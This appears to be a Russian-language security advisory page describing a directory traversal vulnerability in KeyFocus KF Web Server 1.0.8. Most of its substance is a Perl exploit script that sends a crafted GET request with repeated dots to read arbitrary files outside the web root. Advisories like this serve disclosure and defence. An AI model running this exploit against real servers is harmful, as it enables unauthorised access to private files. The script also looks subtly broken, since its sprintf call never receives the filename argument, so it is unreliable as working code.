Доступ к произвольным файлам в KeyFocus KF Web Server

Дата публикации:
18.11.2002
Всего просмотров:
912
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: KeyFocus KF Web Server уязвим к нападениям directory traversal. Уязвимость связанна с неправильной обработкой имени файла, содержащего точки. Эксплуатируя эту уязвимость, атакующий может получить доступ к произвольным файлам вне корневой директории. Эксплоит:
#!/usr/bin/perl 
use URI::Escape; 
use IO::Socket; 
if (@ARGV < 2) { 
print STDOUT "Usage: perl $0 [filename] [host] [port]"; 
} else { 
$f = 
IO::Socket::INET->new(PeerAddr=>$ARGV[1],PeerPort=>$ARGV[2],Proto=>"tcp"); 
$url = uri_escape($ARGV[0]); 
$exploit = sprintf("GET /.............../%s HTTP/1.0\r\n\r\n"); 
print $f $exploit; 
undef $f; 
}
уязвимость обнаружена в Key Focus KF Web Server 1.0.8

Ссылки: KeyFocus KF Web Server File Disclosure Vulnerability
или введите имя

CAPTCHA